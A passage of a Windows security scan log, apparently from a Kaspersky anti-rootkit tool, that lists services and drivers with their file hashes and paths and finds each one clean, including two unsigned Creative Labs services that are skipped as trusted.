09:35:12.0587 0x0ff0  [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
09:35:12.0620 0x0ff0  Brserid - ok
09:35:12.0633 0x0ff0  [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
09:35:12.0652 0x0ff0  BrSerWdm - ok
09:35:12.0664 0x0ff0  [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
09:35:12.0675 0x0ff0  BrUsbMdm - ok
09:35:12.0684 0x0ff0  [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
09:35:12.0692 0x0ff0  BrUsbSer - ok
09:35:12.0705 0x0ff0  [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM        C:\Windows\system32\drivers\bthmodem.sys
09:35:12.0716 0x0ff0  BTHMODEM - ok
09:35:12.0735 0x0ff0  [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv         C:\Windows\system32\bthserv.dll
09:35:12.0757 0x0ff0  bthserv - ok
09:35:12.0771 0x0ff0  [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
09:35:12.0794 0x0ff0  cdfs - ok
09:35:12.0824 0x0ff0  [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom           C:\Windows\system32\DRIVERS\cdrom.sys
09:35:12.0853 0x0ff0  cdrom - ok
09:35:12.0888 0x0ff0  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc     C:\Windows\System32\certprop.dll
09:35:12.0910 0x0ff0  CertPropSvc - ok
09:35:12.0950 0x0ff0  [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass        C:\Windows\system32\DRIVERS\circlass.sys
09:35:12.0960 0x0ff0  circlass - ok
09:35:12.0973 0x0ff0  [ FE1EC06F2253F691FE36217C592A0206, B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE ] CLFS            C:\Windows\system32\CLFS.sys
09:35:12.0987 0x0ff0  CLFS - ok
09:35:13.0048 0x0ff0  [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
09:35:13.0058 0x0ff0  clr_optimization_v2.0.50727_32 - ok
09:35:13.0107 0x0ff0  [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
09:35:13.0123 0x0ff0  clr_optimization_v2.0.50727_64 - ok
09:35:13.0205 0x0ff0  [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
09:35:13.0441 0x0ff0  clr_optimization_v4.0.30319_32 - ok
09:35:13.0450 0x0ff0  [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
09:35:13.0494 0x0ff0  clr_optimization_v4.0.30319_64 - ok
09:35:13.0540 0x0ff0  [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt          C:\Windows\system32\drivers\CmBatt.sys
09:35:13.0553 0x0ff0  CmBatt - ok
09:35:13.0559 0x0ff0  [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide          C:\Windows\system32\drivers\cmdide.sys
09:35:13.0567 0x0ff0  cmdide - ok
09:35:13.0612 0x0ff0  [ EBF28856F69CF094A902F884CF989706, AD6C9F0BC20AA49EEE5478DA0F856F0EA2B414B63208C5FFB03C9D7F5B59765F ] CNG             C:\Windows\system32\Drivers\cng.sys
09:35:13.0641 0x0ff0  CNG - ok
09:35:13.0650 0x0ff0  [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt        C:\Windows\system32\drivers\compbatt.sys
09:35:13.0658 0x0ff0  Compbatt - ok
09:35:13.0671 0x0ff0  [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus    C:\Windows\system32\DRIVERS\CompositeBus.sys
09:35:13.0692 0x0ff0  CompositeBus - ok
09:35:13.0700 0x0ff0  COMSysApp - ok
09:35:13.0725 0x0ff0  [ 829FD68876F4B6484AAF85F1E98BE050, BF94C916A393E0D99DB9E49FB5B37649799EA494112FD7271D0EAC704751F799 ] CorsairVBusDriver C:\Windows\system32\DRIVERS\CorsairVBusDriver.sys
09:35:13.0742 0x0ff0  CorsairVBusDriver - ok
09:35:13.0766 0x0ff0  [ 407237341D4E3D27E987E4B78CAF5359, EBFD281D853D45016C67003B284C88FB4BB59B6ACE181E207CCC4A14449092BC ] CorsairVHidDriver C:\Windows\system32\DRIVERS\CorsairVHidDriver.sys
09:35:13.0772 0x0ff0  CorsairVHidDriver - ok
09:35:13.0782 0x0ff0  [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk         C:\Windows\system32\drivers\crcdisk.sys
09:35:13.0790 0x0ff0  crcdisk - ok
09:35:13.0814 0x0ff0  [ C0EAD9F8AB83D41FF07303C75589C2B8, C89CAC39BCD2FA2DCC56D7EE84FF66127BCECCAE400E119FE41BF4C4D769504B ] Creative Audio Engine Licensing Service C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe
09:35:13.0840 0x0ff0  Creative Audio Engine Licensing Service - detected UnsignedFile.Multi.Generic ( 1 )
09:35:19.0913 0x0ff0  Detect skipped due to KSN trusted
09:35:19.0913 0x0ff0  Creative Audio Engine Licensing Service - ok
09:35:19.0946 0x0ff0  [ 6B400F211BEE880A37A1ED0368776BF4, 2F27C6FA96A1C8CBDA467846DA57E63949A7EA37DB094B13397DDD30114295BD ] CryptSvc        C:\Windows\system32\cryptsvc.dll
09:35:19.0963 0x0ff0  CryptSvc - ok
09:35:19.0983 0x0ff0  [ 54DA3DFD29ED9F1619B6F53F3CE55E49, 9177C6907A983296BF188892A894B668A09FFA058FD56B50FE12940D54B0FA5E ] CSC             C:\Windows\system32\drivers\csc.sys
09:35:20.0021 0x0ff0  CSC - ok
09:35:20.0051 0x0ff0  [ 3AB183AB4D2C79DCF459CD2C1266B043, 72B0187EBA9DC74E61EC5CB3DC24058DDB768843E865801894AAEAA211610C56 ] CscService      C:\Windows\System32\cscsvc.dll
09:35:20.0082 0x0ff0  CscService - ok
09:35:20.0105 0x0ff0  [ 7489647F118A3D01337E998C0E43376A, D28C4EEF1DD2683D2D9F13C076CC9AE335EC2570C13D8BD9916546FB3B8FECAB ] CT20XUT         C:\Windows\system32\drivers\CT20XUT.SYS
09:35:20.0155 0x0ff0  CT20XUT - ok
09:35:20.0179 0x0ff0  [ 7489647F118A3D01337E998C0E43376A, D28C4EEF1DD2683D2D9F13C076CC9AE335EC2570C13D8BD9916546FB3B8FECAB ] CT20XUT.SYS     C:\Windows\System32\drivers\CT20XUT.SYS
09:35:20.0189 0x0ff0  CT20XUT.SYS - ok
09:35:20.0226 0x0ff0  [ 3DD2424FCFC1CC77806FEDF58C9FCC86, 8ADD776B735B6F40C95D1A3601101E1B842152A9947FD80A2F6B854836F2CA73 ] ctac32k         C:\Windows\system32\drivers\ctac32k.sys
09:35:20.0268 0x0ff0  ctac32k - ok
09:35:20.0348 0x0ff0  [ 072280BB26A45B9329C90DA0908D30EA, 14D0A38A3286AA5EC741EB50D0F530C064D51D243BD1C7C821E0855DF043676E ] ctaud2k         C:\Windows\system32\drivers\ctaud2k.sys
09:35:20.0397 0x0ff0  ctaud2k - ok
09:35:20.0575 0x0ff0  [ 5CE3D0E1D1B3832EE052CFC442EEE0FA, 6B9DB2C350140ED547C7A96DB0EAD812E8987176B312C79AF52FC9B23EEEB8C4 ] CTAudSvcService C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
09:35:20.0629 0x0ff0  CTAudSvcService - detected UnsignedFile.Multi.Generic ( 1 )
09:35:23.0742 0x0ff0  Detect skipped due to KSN trusted
09:35:23.0742 0x0ff0  CTAudSvcService - ok
09:35:23.0850 0x0ff0  [ AE0369026137A2E78A27C4843B662CA8, 668A96D93FDB75626FF2A07BEEB8715E2168FFD29B63A5D3142FCE30EB68B8DD ] CTEXFIFX        C:\Windows\system32\drivers\CTEXFIFX.SYS
09:35:23.0901 0x0ff0  CTEXFIFX - ok
09:35:24.0034 0x0ff0  [ AE0369026137A2E78A27C4843B662CA8, 668A96D93FDB75626FF2A07BEEB8715E2168FFD29B63A5D3142FCE30EB68B8DD ] CTEXFIFX.SYS    C:\Windows\System32\drivers\CTEXFIFX.SYS
09:35:24.0061 0x0ff0  CTEXFIFX.SYS - ok
09:35:24.0087 0x0ff0  [ 8899C1860731AFF09DB7C63875C87D3C, 05D6FED6B73F665E1D1D3A6421BAFD5CC3DF7D3A13D547B0163098905B8A79F2 ] CTHWIUT         C:\Windows\system32\drivers\CTHWIUT.SYS
09:35:24.0140 0x0ff0  CTHWIUT - ok
09:35:24.0144 0x0ff0  [ 8899C1860731AFF09DB7C63875C87D3C, 05D6FED6B73F665E1D1D3A6421BAFD5CC3DF7D3A13D547B0163098905B8A79F2 ] CTHWIUT.SYS     C:\Windows\System32\drivers\CTHWIUT.SYS
09:35:24.0152 0x0ff0  CTHWIUT.SYS - ok
09:35:24.0154 0x0ff0  [ 58871CFF66392727CF4F36BA54A3B3C4, ECAF4FCDFE8D46FA1F307F1AE556E82F47072C9C611306E6BCD579FE8E7710E2 ] ctprxy2k        C:\Windows\system32\drivers\ctprxy2k.sys
09:35:24.0170 0x0ff0  ctprxy2k - ok
09:35:24.0194 0x0ff0  [ E6710DA0D8077F40888F57B49664546F, FED156A6279FF946014281DEF15AC1858D420F0D0FF5B45ED9FEBB2E018EE331 ] ctsfm2k         C:\Windows\system32\drivers\ctsfm2k.sys
09:35:24.0214 0x0ff0  ctsfm2k - ok
09:35:24.0271 0x0ff0  [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] DcomLaunch      C:\Windows\system32\rpcss.dll
09:35:24.0312 0x0ff0  DcomLaunch - ok
09:35:24.0374 0x0ff0  [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc       C:\Windows\System32\defragsvc.dll
09:35:24.0410 0x0ff0  defragsvc - ok
09:35:24.0432 0x0ff0  [ 9BB2EF44EAA163B29C4A4587887A0FE4, 03667BC3EA5003F4236929C10F23D8F108AFCB29DB5559E751FB26DFB318636F ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
09:35:24.0463 0x0ff0  DfsC - ok
09:35:24.0486 0x0ff0  [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp            C:\Windows\system32\dhcpcore.dll
09:35:24.0511 0x0ff0  Dhcp - ok
09:35:24.0522 0x0ff0  [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache        C:\Windows\system32\drivers\discache.sys
09:35:24.0550 0x0ff0  discache - ok
09:35:24.0582 0x0ff0  [ 9819EEE8B5EA3784EC4AF3B137A5244C, 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427 ] Disk            C:\Windows\system32\drivers\disk.sys
09:35:24.0591 0x0ff0  Disk - ok
09:35:24.0617 0x0ff0  [ 5DB085A8A6600BE6401F2B24EECB5415, 5FC5C7C1B4DB7BF6EFD0992E91DB41FD047E90D1ABA0B8F868CB72557F88FB13 ] dmvsc           C:\Windows\system32\drivers\dmvsc.sys
09:35:24.0637 0x0ff0  dmvsc - ok
09:35:24.0657 0x0ff0  [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache        C:\Windows\System32\dnsrslvr.dll
09:35:24.0686 0x0ff0  Dnscache - ok
09:35:24.0700 0x0ff0  [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc         C:\Windows\System32\dot3svc.dll
09:35:24.0727 0x0ff0  dot3svc - ok
09:35:24.0741 0x0ff0  [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS             C:\Windows\system32\dps.dll
09:35:24.0792 0x0ff0  DPS - ok
09:35:24.0841 0x0ff0  [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
09:35:24.0891 0x0ff0  drmkaud - ok
09:35:25.0065 0x0ff0  [ 87CE5C8965E101CCCED1F4675557E868, 077D98F0F130B2FC710208BA34016EF2B2506EE2BD71740B228145E34A3046F1 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
09:35:25.0087 0x0ff0  DXGKrnl - ok
09:35:25.0106 0x0ff0  EagleX64 - ok
09:35:25.0115 0x0ff0  [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost         C:\Windows\System32\eapsvc.dll
09:35:25.0139 0x0ff0  EapHost - ok
09:35:25.0161 0x0ff0  EasyAntiCheat - ok
09:35:25.0273 0x0ff0  [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv           C:\Windows\system32\drivers\evbda.sys
09:35:25.0374 0x0ff0  ebdrv - ok
09:35:25.0428 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] EFS             C:\Windows\System32\lsass.exe
09:35:25.0453 0x0ff0  EFS - ok
09:35:25.0492 0x0ff0  [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
09:35:25.0521 0x0ff0  ehRecvr - ok
09:35:25.0536 0x0ff0  [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched         C:\Windows\ehome\ehsched.exe
09:35:25.0555 0x0ff0  ehSched - ok
09:35:25.0580 0x0ff0  [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor         C:\Windows\system32\drivers\elxstor.sys
09:35:25.0599 0x0ff0  elxstor - ok
09:35:25.0625 0x0ff0  [ EC7E779C96E099258D50E54359528DBD, 070D0EFE9DCC9DD7943CBEBC03543591AFA1F25FA9CEC037D319FC9CB1E1E793 ] emupia          C:\Windows\system32\drivers\emupia2k.sys
09:35:25.0643 0x0ff0  emupia - ok
09:35:25.0653 0x0ff0  [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
09:35:25.0666 0x0ff0  ErrDev - ok
09:35:25.0693 0x0ff0  [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem     C:\Windows\system32\es.dll
09:35:25.0735 0x0ff0  EventSystem - ok
09:35:25.0770 0x0ff0  [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat           C:\Windows\system32\drivers\exfat.sys
09:35:25.0796 0x0ff0  exfat - ok
09:35:25.0808 0x0ff0  [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
09:35:25.0838 0x0ff0  fastfat - ok
09:35:25.0870 0x0ff0  [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax             C:\Windows\system32\fxssvc.exe
09:35:25.0899 0x0ff0  Fax - ok
09:35:25.0912 0x0ff0  [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc             C:\Windows\system32\drivers\fdc.sys
09:35:25.0922 0x0ff0  fdc - ok
09:35:25.0933 0x0ff0  [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost         C:\Windows\system32\fdPHost.dll
09:35:25.0954 0x0ff0  fdPHost - ok
09:35:25.0964 0x0ff0  [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub        C:\Windows\system32\fdrespub.dll
09:35:25.0992 0x0ff0  FDResPub - ok
09:35:26.0007 0x0ff0  [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
09:35:26.0015 0x0ff0  FileInfo - ok
09:35:26.0025 0x0ff0  [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
09:35:26.0048 0x0ff0  Filetrace - ok
09:35:26.0055 0x0ff0  [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk        C:\Windows\system32\drivers\flpydisk.sys
09:35:26.0064 0x0ff0  flpydisk - ok
09:35:26.0080 0x0ff0  [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
09:35:26.0092 0x0ff0  FltMgr - ok
09:35:26.0134 0x0ff0  [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] FontCache       C:\Windows\system32\FntCache.dll
09:35:26.0181 0x0ff0  FontCache - ok
09:35:26.0219 0x0ff0  [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
09:35:26.0227 0x0ff0  FontCache3.0.0.0 - ok
09:35:26.0230 0x0ff0  [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
09:35:26.0239 0x0ff0  FsDepends - ok
09:35:26.0259 0x0ff0  [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
09:35:26.0267 0x0ff0  Fs_Rec - ok
09:35:26.0283 0x0ff0  [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
09:35:26.0295 0x0ff0  fvevol - ok
09:35:26.0309 0x0ff0  [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx        C:\Windows\system32\drivers\gagp30kx.sys
09:35:26.0318 0x0ff0  gagp30kx - ok
09:35:26.0430 0x0ff0  [ 2360D72739721F76A1CF245CDAE4EF2B, 03BB7DD3DF6FF22941F15BAA6ED4B34518C21232D616FC36EFA448D2B7357D65 ] GalaxyClientService C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe
09:35:26.0566 0x0ff0  GalaxyClientService - ok
09:35:27.0039 0x0ff0  [ 4FED2E420F8C04F815083BA2E989736F, 2789106D4A1C29C64EB04E6C0E0853DB07D12B843CEE6A1548033778834134D3 ] GalaxyCommunication C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe
09:35:27.0463 0x0ff0  GalaxyCommunication - ok
09:35:27.0632 0x0ff0  [ 21931B9C5FDE6087F47F710AC1BE16E9, A727A8922A9769AAC77F5D85ED3475853655E9483C8DA091653D0B1F3D479398 ] GfExperienceService C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
09:35:27.0691 0x0ff0  GfExperienceService - ok
09:35:27.0739 0x0ff0  [ 277BBC7E1AA1EE957F573A10ECA7EF3A, 2EE60B924E583E847CC24E78B401EF95C69DB777A5B74E1EC963E18D47B94D24 ] gpsvc           C:\Windows\System32\gpsvc.dll
09:35:27.0774 0x0ff0  gpsvc - ok
09:35:27.0879 0x0ff0  [ DD7423ABBE2913E70D50E9318AD57EE4, 74BC123808F3FA60ADDC51C1383F8250608D3DBA3A8DC175B3418A1CF0BC53E9 ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
09:35:27.0887 0x0ff0  gupdate - ok
09:35:27.0892 0x0ff0  [ DD7423ABBE2913E70D50E9318AD57EE4, 74BC123808F3FA60ADDC51C1383F8250608D3DBA3A8DC175B3418A1CF0BC53E9 ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
09:35:27.0899 0x0ff0  gupdatem - ok
09:35:27.0938 0x0ff0  [ 30CB0732BB41F4E11C7418A1334578B5, F0EAE914C8FE73365D3AFA0BEFD79D6B08DA7DBFB73BF639514BB65D169C2A86 ] ha20x22k        C:\Windows\system32\drivers\ha20x22k.sys
09:35:28.0009 0x0ff0  ha20x22k - ok
09:35:28.0210 0x0ff0  [ 6C5C963BE748062CE0746B16BD5E0D54, 9350498A6F77D21EA56CC858B5D834062B7572C35D7525241766E4FB4DC588C8 ] ha20x2k         C:\Windows\system32\drivers\ha20x2k.sys
09:35:28.0342 0x0ff0  ha20x2k - ok
09:35:28.0397 0x0ff0  [ 1E6438D4EA6E1174A3B3B1EDC4DE660B, F9995CFEC7BBFE10B06EEE04CA6B49658275C43096E57747BFF9C2C31A0F9011 ] hamachi         C:\Windows\system32\DRIVERS\hamachi.sys
09:35:28.0407 0x0ff0  hamachi - ok
09:35:28.0444 0x0ff0  [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
09:35:28.0458 0x0ff0  hcw85cir - ok
09:35:28.0487 0x0ff0  [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
09:35:28.0526 0x0ff0  HdAudAddService - ok
09:35:28.0549 0x0ff0  [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
09:35:28.0571 0x0ff0  HDAudBus - ok
09:35:28.0579 0x0ff0  [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt         C:\Windows\system32\drivers\HidBatt.sys
09:35:28.0596 0x0ff0  HidBatt - ok
09:35:28.0608 0x0ff0  [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth          C:\Windows\system32\drivers\hidbth.sys
09:35:28.0647 0x0ff0  HidBth - ok
09:35:28.0671 0x0ff0  [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr           C:\Windows\system32\drivers\hidir.sys
09:35:28.0692 0x0ff0  HidIr - ok
09:35:28.0704 0x0ff0  [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv         C:\Windows\system32\hidserv.dll
09:35:28.0734 0x0ff0  hidserv - ok
09:35:28.0778 0x0ff0  [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
09:35:28.0800 0x0ff0  HidUsb - ok
09:35:28.0829 0x0ff0  [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc          C:\Windows\system32\kmsvc.dll
09:35:28.0858 0x0ff0  hkmsvc - ok
09:35:28.0868 0x0ff0  [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
09:35:28.0882 0x0ff0  HomeGroupListener - ok
09:35:28.0890 0x0ff0  [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
09:35:28.0902 0x0ff0  HomeGroupProvider - ok
09:35:28.0919 0x0ff0  [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
09:35:28.0934 0x0ff0  HpSAMD - ok
09:35:28.0977 0x0ff0  [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
09:35:29.0019 0x0ff0  HTTP - ok
09:35:29.0040 0x0ff0  [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
09:35:29.0048 0x0ff0  hwpolicy - ok
09:35:29.0063 0x0ff0  [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
09:35:29.0073 0x0ff0  i8042prt - ok
09:35:29.0106 0x0ff0  [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
09:35:29.0122 0x0ff0  iaStorV - ok
09:35:29.0287 0x0ff0  [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc           C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
09:35:29.0329 0x0ff0  idsvc - ok
09:35:29.0331 0x0ff0  IEEtwCollectorService - ok
